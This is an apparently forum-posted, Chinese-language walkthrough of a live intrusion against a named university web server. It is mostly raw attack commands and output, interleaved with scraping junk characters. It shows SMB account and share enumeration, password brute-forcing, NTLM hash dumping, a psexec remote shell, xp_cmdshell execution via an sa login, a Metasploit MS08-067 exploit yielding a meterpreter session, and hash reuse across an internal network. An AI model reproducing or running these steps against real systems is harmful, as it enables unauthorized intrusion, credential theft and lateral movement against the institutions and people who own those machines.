广西师范网站http://202.103.242.241/. z$ f5 g J) m1 @+ y5 q) R
: @" L9 w( @4 U; g9 M% G" j' y2 ?root@bt:~# nmap -sS -sV 202.103.242.241* m7 f/ o$ e$ g# O
, E q# D. W, g" x8 p% _
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST0 B' ^9 Y' ]& K3 H0 d, k$ H/ r% ?
2 V* r1 ]$ d |; f$ \, H& h' i; |
Nmap scan report for bogon (202.103.242.241)
* U U0 g, P3 K: q& Q( |4 s" t3 N5 m0 X0 j7 y* ~; I: \
Host is up (0.00048s latency).* n1 c8 H' f r% E0 }0 y% w6 F
. a& I; D; o; y' z0 V6 `% {
Not shown: 993 closed ports
4 I3 n( ]% N/ y: h) P7 `: |% V3 J& y7 R6 L0 f
PORT STATE SERVICE VERSION
3 ~; f1 z, j1 l
' |. j9 |, b+ u$ |( [' q- _135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)$ g! o- D* S2 S) T3 s( w9 [' ?+ x
1 @; _2 w4 @; I
139/tcp open netbios-ssn* v+ C6 r( S1 j% M5 J6 j
0 m. Q- b. G( e/ \0 G8 S445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
* r8 i2 [5 D8 ]. I" k
$ l2 q1 p7 g7 [( H4 |1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)( }- J9 H7 d4 W q
" f8 r, @* i* Z, |9 S, D" B: ^
1026/tcp open msrpc Microsoft Windows RPC' m2 {' i$ \7 U
q' c* r" @6 p5 {8 j
3372/tcp open msdtc?
6 Z; f5 `* ^( B
: Z9 B: Z5 p+ S5 i7 T* n1 X3389/tcp open ms-term-serv?+ \+ q' \! J+ n+ _
' s, e; p8 }) M9 T) R9 A c: j+ I4 ~
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :% q" d0 s! L6 h) y
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r* L/ {' D/ y9 M5 p( @0 t
6 P, U- F$ @6 d3 k0 ?8 ]SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions z; b0 b4 Z5 ?2 S1 U( {
6 h I- I m6 ^' U& V
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”) m+ z$ i& q% M
6 z% z0 A. u# V; G2 w
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
7 l1 w. h3 Q+ P9 u- v9 b- e& ?+ d
( B+ b+ Q) c$ n5 R; @1 l0 xSF:ptions,6,”hO\n\x000Z”);% ]1 u# |! S7 b
0 _* P- O z& `# k( }
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
) ^/ F1 ~: ^+ q; t/ x( t& x8 w- C1 _ {; p" N" r5 v* ]
Service Info: OS: Windows
6 {1 ?6 O/ a4 k9 }2 M; S, r# b- s( O0 o! z, g
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .7 ?& X6 {( K4 k. X* T
( t5 |) _2 H$ K% i, A( d
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds$ g# H. \/ N: m8 y. h9 {& i
3 A' n0 ^ j. t# j
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本1 O& q2 W* L; {6 [$ i, H% k
~5 L$ l$ W/ n9 a" c-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
) a: o5 M4 L5 Y r, ^5 [
0 `. N. v/ `1 {& v. z. X C-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
& ?* b7 T5 g" X+ C Z/ j, X0 H. k, u( V8 |) Q1 @
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse8 g$ V* s8 Z" h _" m
+ @0 U3 n `3 ~" x2 N; G
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
' {. B$ w9 I0 V
4 B* _+ D0 ~6 |. U& X-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse3 |& Z0 F4 X; R
N3 M; m" A' ?4 a( J
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
! G; D( l. v0 v, F0 J1 s, `8 s% y0 ^ T1 W8 X6 [
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse6 K2 u: M/ x6 {6 F) T' [
! x0 B) S$ E6 I3 \-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
/ }1 q A4 s$ C. D! F! i% i5 T
7 Z! c' ^: j: o, G4 W1 v: ^-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
: j: W% Y1 ]! S* ]% |9 }2 j
9 e+ o; T9 O) @* l5 @4 f: T1 Z-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
( q$ v4 u* B, ^( H. @2 q
1 `6 z( C# a: W-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse7 D$ K% m0 w. r4 b1 k7 X( M
/ {4 _( _2 s0 ~6 K* b
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
8 `) E& Z. o& Z9 L+ H2 m' O
& { w0 h: D, r1 [9 I-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
: B+ ^, F2 O! y; L3 L, M+ U7 s% ^3 t% |
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse$ W0 R1 ]$ @4 ^# @: \
4 r5 {: _' X0 w2 B" g, F
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse; ^, l: N/ x' @- m1 ]1 |! m+ T
/ y1 L! `! D h* `8 ~root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 - T T1 V( w$ ^% J% v. X
3 P6 d6 i3 E# t) z
//此乃使用脚本扫描远程机器所存在的账户名
/ L1 R J' P, N
6 u. \1 ?! f5 D$ `2 FStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST/ [# P$ i* u, Y% f1 o) u# Y
" w4 K, U! g% W' |6 r3 W- pNmap scan report for bogon (202.103.242.241)
; h9 J, b" l+ o% g6 Q4 H6 t9 ~# r8 H. ~' z
Host is up (0.00038s latency).
/ G, s% g3 V/ I, I5 `) V$ n3 _) z0 _4 g
Not shown: 993 closed ports
# b7 t- G3 f3 u& y) |; E; K$ v! J! ]+ f
PORT STATE SERVICE
- k* V, h6 Z( K/ A6 c8 R; @* j% `
1 ?3 E) p. L/ B% \* o' u2 [! h7 `7 M. o135/tcp open msrpc# ]+ @% `* ^' Q! Y3 g* n6 }
" d! m# A1 @7 |( L
139/tcp open netbios-ssn
$ `2 s/ M, f2 @- a9 |/ F& H- b, d9 J; F q
445/tcp open microsoft-ds" [" N$ j. ~' v) E
+ m0 t) c2 s. V7 `
1025/tcp open NFS-or-IIS; g) l% e) X: O7 B# |
- _6 f: f/ j' |
1026/tcp open LSA-or-nterm
# w' G5 y1 l1 Y+ X8 Y: y
' e+ g# ^$ r; C3372/tcp open msdtc
; `' g7 s8 N& m* G" B- U7 W3 S# W, L7 `8 H8 L4 W
3389/tcp open ms-term-serv
: L1 z* U/ ]! X3 [& l- W' u% F- k; @
2 ?3 C- v% e7 xMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)' c9 _4 R$ A3 @1 g
% l5 F5 K; R7 g9 [$ P+ FHost script results:4 s$ F8 m2 r: M
q4 c7 m! L! q8 r" p
| smb-enum-users:) l( a! f- l% C9 t" v6 i
- q: Q0 C& \' m7 L* q& a. @9 a|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
* T! }$ `6 |" w/ }$ K: X
2 t. v/ h/ R' ^Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
5 Y+ m( n) L: I# O9 @ o. I0 @3 t+ T8 N
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 6 Q" L6 x p' D% Z
8 P7 s Y& l* m7 F. Z
//查看共享: B7 U7 @. R& ~: b/ Z
2 H* ?& a! a0 j& ?- A8 L3 AStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
& q3 l Z' {) c
o, ^8 T D3 R0 |' v0 |Nmap scan report for bogon (202.103.242.241)/ w4 M8 C K. `1 y& [, v
' I: O9 a% C+ H
Host is up (0.00035s latency).
4 Y r3 v+ I: v5 g; ~* C5 I5 h& y; j3 k3 P: i' D, e
Not shown: 993 closed ports
0 K0 m6 W' X4 e
6 Z4 P9 I' m* {$ dPORT STATE SERVICE
2 E' X; s8 ? v: B* I7 t+ H/ N2 `' @
135/tcp open msrpc
- x* k3 j9 v0 [7 G; \% Q
8 t( @+ H' v j+ A139/tcp open netbios-ssn6 B7 o: s$ C5 q2 [
' H2 }, N2 i+ y0 A A) ]0 Y0 }# @# { y445/tcp open microsoft-ds* J1 A4 `) y( J( H# {
x9 b- K7 f7 S/ z6 F( `- J! M- }
1025/tcp open NFS-or-IIS0 _- ], {+ n& R/ `
: V& B$ r }0 [/ Z
1026/tcp open LSA-or-nterm
% B* q- ~( ?2 i G0 {4 `: d0 h. y. R
3372/tcp open msdtc
- Q M5 Y- {, ^' R8 @9 F6 r- ]: Q1 Z5 q \2 {7 `
3389/tcp open ms-term-serv1 g* O5 W) u! S9 `6 k
: h F) B9 [" g6 B0 U* @% I H* q
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
5 O5 d. D$ ?. W$ g, u+ R/ [, l/ J" z) ~, A2 ^6 u
Host script results:
& b! a) ~' ]( ]! U, ~; I' l. U5 b9 i6 H5 z) t; x! }$ L4 g
| smb-enum-shares:
$ ?/ e- E9 h b" \+ Z A( R' L7 @ V2 [0 q' P6 }9 i" }
| ADMIN$
+ l* O. ?! |0 ]3 v L* W: }. W6 t( m" h7 ^) X0 ?
| Anonymous access: <none>& j# c* u0 P A& F9 e. G
9 \% O: `4 {* ?) C) Z
| C$
( ], N0 m+ E8 u9 k$ J3 ?* r7 Q5 L: X- C
| Anonymous access: <none>+ Z3 H7 I6 \8 L6 b9 w& J
3 B! ~: J- ^& v+ q| IPC$; L& A4 T3 x9 ]
/ a2 `- b; x8 \' J4 H+ D& b|_ Anonymous access: READ' O* N: i0 K" m( Q" S
: K6 o0 h, ^; t
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds1 V9 t) b3 g8 ^# c. \& b. H
/ Y& C9 a' n7 y; u2 k2 xroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
9 K P$ P# T3 F* t) k
6 } N8 _1 t/ J4 b% D//获取用户密码/ L2 i& C6 x9 q. y6 }) N b
* u# s9 t- H" z1 C8 S% J+ _' YStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
) T( I$ K( ?2 Z/ s9 B) ?& H8 \+ {# A( j& `0 W! L
Nmap scan report for bogon (202.103.242.2418)4 x; Q! X7 e, Q' F
6 o* K5 C8 h" ]6 q8 Z
Host is up (0.00041s latency).
6 [( t' P) o+ k0 b2 [9 |9 v3 J7 A* N% d
Not shown: 993 closed ports4 F# O W+ c6 X. r
1 @& \2 Z% s( Z: z. ]" }( J |1 b
PORT STATE SERVICE
9 U& I& R! g0 l% |0 ~6 A) U% B" [$ }* }0 `+ T
135/tcp open msrpc5 @ F! g7 B& L, M
* ~4 i3 j3 p' l/ N139/tcp open netbios-ssn) S8 t0 _/ T! z2 w8 }" o* e
/ h; [, Y1 P$ i8 `
445/tcp open microsoft-ds. }( b6 t5 g* }; ~8 S6 Z
8 T- b3 V) c6 G# E
1025/tcp open NFS-or-IIS
% \# m3 @/ K M2 l4 ]6 B
4 L0 E- |' N$ R5 T1026/tcp open LSA-or-nterm
# f: m* |7 {4 j
/ k( w* c8 S) j7 F! m/ a8 N3372/tcp open msdtc+ I5 `# M/ x6 C
) o; U' p+ R9 h" M: n7 S" I6 t) J
3389/tcp open ms-term-serv8 d& E2 \! [1 T2 ]
0 J4 k* |+ p; |" h& o
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
) L, d3 V+ N4 F5 \+ V: Q$ Y+ T8 K9 s) v/ Q
Host script results:1 t, g1 ]( J6 L
, U n, u& Z. t
| smb-brute:
4 @# y/ ~) c" L, t( X& `$ A- e z/ V) f* d5 M* h1 f
administrator:<blank> => Login was successful
0 h k0 w( U* f# N* l, }5 G7 c! u& o+ c9 N5 P
|_ test:123456 => Login was successful
: l% M6 o1 ?7 z- c* O$ y* c
& h2 w Z- i9 P7 V; H7 |1 w9 q. @: VNmap done: 1 IP address (1 host up) scanned in 28.22 seconds& L6 ]9 ]/ B T8 ]
) c) n7 f. j4 r9 b4 H* J7 k( Kroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash3 V' ?# e* x4 D( |! d
$ A! F8 ?3 D! v1 c5 l, C' j9 ]root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data, w X+ k# D4 ^
" d4 f7 C- b3 ~" ?
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse! G' Z4 B. z. W
2 y* Q* F& Q* l+ W7 Kroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139# S% f) j) a& N- n3 f
; D$ i1 Z& r) Q8 P2 g8 k9 eStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
; w, r6 d: g' u4 O# k E; U, n7 i: n8 F! C( g) N1 r c
Nmap scan report for bogon (202.103.242.241)
' J+ d' P2 T; y7 ]6 m- e( F7 v+ _5 i7 f/ ^3 Z1 {
Host is up (0.0012s latency).- ~! E0 _2 ~' a' r0 Y* w
7 Y. U: e; ]: a! \: w
PORT STATE SERVICE% E1 z f* G$ ~) P: o9 S
; k2 D+ ]3 ?6 a& S1 p" e1 [/ \
135/tcp open msrpc
% Q& L) D9 S1 @$ r8 ]# M T; W1 _2 X2 K/ `# q
139/tcp open netbios-ssn# J# ^! f# H! N! w. r
* G$ p1 l; d* N445/tcp open microsoft-ds* }; z* u" Y* X
7 y# V M: B5 U) ?& `
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
3 w4 E6 a8 K1 Z/ m$ A1 z H0 e; ~0 d A" _
Host script results:: ^* a& G5 r+ B6 N! o
* x+ C* Y0 U* m9 _, v2 n| smb-pwdump:
7 [! q" J& E; t. W+ W1 ^# N" ]2 f7 n
! V$ a2 R! P3 x| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************3 L( C0 I( N9 e) d
8 ^" g7 m. p5 C8 s| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************/ r- H' t) i4 f
$ q" Q, S7 {4 |; ~3 n
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4# [5 s: L& D% Q7 j: h( u
" G! r* i. u) |* Z0 {0 W- l
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
3 u. O7 n8 Y8 G! _% N6 U3 ?3 z7 ^6 k
, S9 F; | x8 A# U3 gNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
6 G5 a9 U6 z% b/ z- F# n3 F2 L0 A, M
+ [1 f1 X5 X4 i; XC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
6 o7 `: a2 K0 i, S
% [% P A; h- _+ l C$ D; `-p 123456 -e cmd.exe1 G2 q; k7 E& W2 J/ }
! w8 e6 f+ h# I; J/ [6 XPsExec v1.55 – Execute processes remotely
+ M+ U6 V+ m) u) e' W# i6 I! j3 I+ ^
Copyright (C) 2001-2004 Mark Russinovich
: W- t$ o0 ^) W3 J2 S
% ^3 _2 f# _: y4 USysinternals – www.sysinternals.com
$ E& q. d8 e! M& e0 Z2 K2 a- ?7 o
Microsoft Windows 2000 [Version 5.00.2195]
4 P3 a$ e; [2 O/ Z6 ^3 T! w% T2 R: o
(C) 版权所有 1985-2000 Microsoft Corp.
' B( B- _1 i! h
. \8 [/ Y5 a' ]C:\WINNT\system32>ipconfig
9 w) E- W- S3 i# ]$ ?3 ^3 t' M) F, W' l: E8 M! @% ^ n/ U# y; J
Windows 2000 IP Configuration/ F, O4 ^: Z4 x2 e3 m8 Q
$ | t6 _# L+ K' vEthernet adapter 本地连接:& x8 y: @- \/ j( R
* G' o3 q9 Z( k- L* C* C8 H) d0 TConnection-specific DNS Suffix . :
3 ^+ s- |' t, `# R7 H* Q$ u' w/ w7 P' J; I" [1 R
IP Address. . . . . . . . . . . . : 202.103.242.241
/ E8 y' W" K* k) S, b# j% |2 m& ?! m( _! V6 L8 Q
Subnet Mask . . . . . . . . . . . : 255.255.255.0% p! A9 q1 R9 d2 T' A% Z
$ z) }- `& ]1 I5 [
Default Gateway . . . . . . . . . : 202.103.1.1$ N) O ?1 i6 O4 }0 f
% X- G* a0 v1 q
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
2 K/ Y- R+ k) n1 ^" ]
* R4 o1 k% D! H$ a D8 Sroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
$ w* C9 V( z2 n1 Z) d
) q8 A% X& R( n8 V- ?3 A. t: VStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
3 X" y# F5 a" W" b+ i9 Q" {% S4 t9 ]' I3 g! e
Nmap scan report for bogon (202.103.242.241)0 _1 T% F% n, ?, P
7 |' t& u4 S% X+ T0 G( C6 d
Host is up (0.00046s latency).
) Q4 j0 }/ `* R i# Q y' h& N- Q' j
Not shown: 993 closed ports
' F$ M+ {7 x; i3 g/ J% n/ _6 i3 a9 Q: U& P- ~
PORT STATE SERVICE5 q3 s; p- v8 j- B* [3 z
/ E7 |$ V1 X/ U* A+ v' B
135/tcp open msrpc
9 n( s ^4 \) z$ z" Q
+ {6 D7 D( A% n$ w$ l139/tcp open netbios-ssn
6 Y% }- i2 i& P. ?
/ v: \( M. A* j445/tcp open microsoft-ds9 ^7 T* J `5 `
! j2 @8 L7 }9 w; v7 M4 n9 F0 A1025/tcp open NFS-or-IIS* ` E; }, c" j+ H: y- f, c
0 L2 Z( D5 t# @7 ~( _6 A
1026/tcp open LSA-or-nterm
2 ?, s, M) W/ C8 U6 n# o2 v
& `% W! B; x: i. o6 P3372/tcp open msdtc
8 ^6 ~( E0 }' ? a" k% t( n
* c& s; j8 `7 k* x3389/tcp open ms-term-serv
, x" m- s4 ]0 b% z9 g" M
' N" ]8 x0 {! x6 ?3 I( ?MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
: b5 E4 t. u6 b8 P
; h+ f3 O, b1 g4 P4 VHost script results:
0 J! A# i8 r( L9 q7 r/ _( F0 ~1 z3 d* U- W* u
| smb-check-vulns:
) v) q- [6 x3 i8 p% g& r# T$ w4 ^4 c' |4 g$ }
|_ MS08-067: VULNERABLE/ V) Y# c5 C% ?4 ~4 F
; \+ Z1 d% W9 |) N1 ~$ }Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds8 x9 L5 C6 d5 e2 n, a
, {: L3 k7 e3 \, D2 g
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
7 {5 ]- a2 S* h0 z' a0 F( G
, Y/ K6 t9 L. }5 Pmsf > search ms083 c: g2 n( d \) n' g3 k* j' [& W
7 L" q$ B0 q; }" Y% }+ {msf > use exploit/windows/smb/ms08_067_netapi
; j ~ H, ?( e# _- Y4 ?" _; e/ j! c
msf exploit(ms08_067_netapi) > show options: p3 o: O8 c: g$ j% t1 A
1 V, Z4 E& W$ o) H4 C- mmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
7 l. Z7 P# T0 t7 w) l3 e5 f# F5 @, M: Y
msf exploit(ms08_067_netapi) > show payloads3 ~0 z. P7 s& A0 \3 I1 Q
1 [: ^8 R- G0 O! Qmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
' z( w6 M" J3 R7 S5 @1 e a; h; \
msf exploit(ms08_067_netapi) > exploit& o, ~0 R# Z" Z
+ A- I% U% u! \
meterpreter >: n2 l7 Z) l f; C
7 b5 W6 [: a+ u8 O) N5 KBackground session 2? [y/N] (ctrl+z)
3 c$ L8 g/ D7 M5 ~ J( a, T
9 T9 A# L% z: e2 cmsf exploit(ms08_067_netapi) > sessions -l
6 ~0 e6 {5 x3 S/ F
/ G. }( R+ J+ M6 W4 Mroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
! j5 @6 X; X) }
) W7 `6 z. d" o+ a" J" G* Jtest
/ p$ `* c' t5 c, E" U0 i! J7 a
% ?$ M X9 q' P5 d7 F" Nadministrator: k2 w8 V8 W# ]5 L- ^: c
2 T: h( `9 Q+ f
root@bt:/usr/local/share/nmap/scripts# vim password.txt# ?; h1 O* I- p/ u7 ^7 v% l4 H0 W
# s* X4 f$ L6 J( x- N
44EFCE164AB921CAAAD3B435B51404EE
+ F7 v! I% i9 A8 |
# ` n9 ?; r& B$ k B8 broot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
2 e6 T/ J' Q1 i& W f6 E& p- K% z* F8 i6 W; g) W. W" R
//利用用户名跟获取的hash尝试对整段内网进行登录
2 w- I( M: }4 ~- w% U, d7 i1 k* O; D$ l) u
" G9 v& \& v1 [3 E1 TNmap scan report for 192.168.1.105& B* {" A, R# w* f. t7 ?% I4 E
2 Y! T& ]# ~& ~$ D3 z; Z; P
Host is up (0.00088s latency).9 M- ?& H% g& N: U& q! `
. P3 R0 M+ V7 W: T1 }6 y- W
Not shown: 993 closed ports
" D: J- `. Y! L% r9 S4 Q. O3 c( a; m+ I% A4 O, U2 f9 H
PORT STATE SERVICE
/ J- \$ Q$ a5 y8 `1 k' S" W+ P# v
135/tcp open msrpc+ G5 i( D$ ?0 W, `6 n- Z
( u% M c, i$ Y* s# z$ Q0 \. E' G# L
139/tcp open netbios-ssn6 N& i. E! I3 p2 o
* l7 U8 W B- x N( G* s
445/tcp open microsoft-ds' g9 z2 G+ y, v
9 H/ I& J$ Y+ p3 _
1025/tcp open NFS-or-IIS
. Y% S% N) O S5 _' ?' g, Y0 _0 d% O1 t- V
1026/tcp open LSA-or-nterm& c, V8 h: z3 b0 R: g; ?% V. X
$ s/ c8 e, R7 g3372/tcp open msdtc
) Y6 {$ p. ?0 M1 {) j: B
, ^; m [' d/ S( ?( ]9 a3389/tcp open ms-term-serv- j4 T" L/ M& F' R! I
$ V% N. {& L" j' h
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
! V0 D+ W/ o- _% J! e' ^- ~( b0 b4 ]5 W8 ^$ W0 S: H3 U
Host script results:
) _$ |3 l( \' u2 D( T F9 \- ?/ x: x4 U8 k1 ~6 U
| smb-brute:
% l' U0 X0 E6 }+ m- Y o; t4 x7 T7 Y0 X! Q, K) b1 ~
|_ administrator:<blank> => Login was successful
- B) z9 q7 v# [' l) Q/ l" R6 S. k% @5 K& w" L
攻击成功,一个简单的msf+nmap攻击~~·
5 x7 I Z3 E- Q0 v
/ f. N- L; q3 u* c# ~3 Z4 z: P |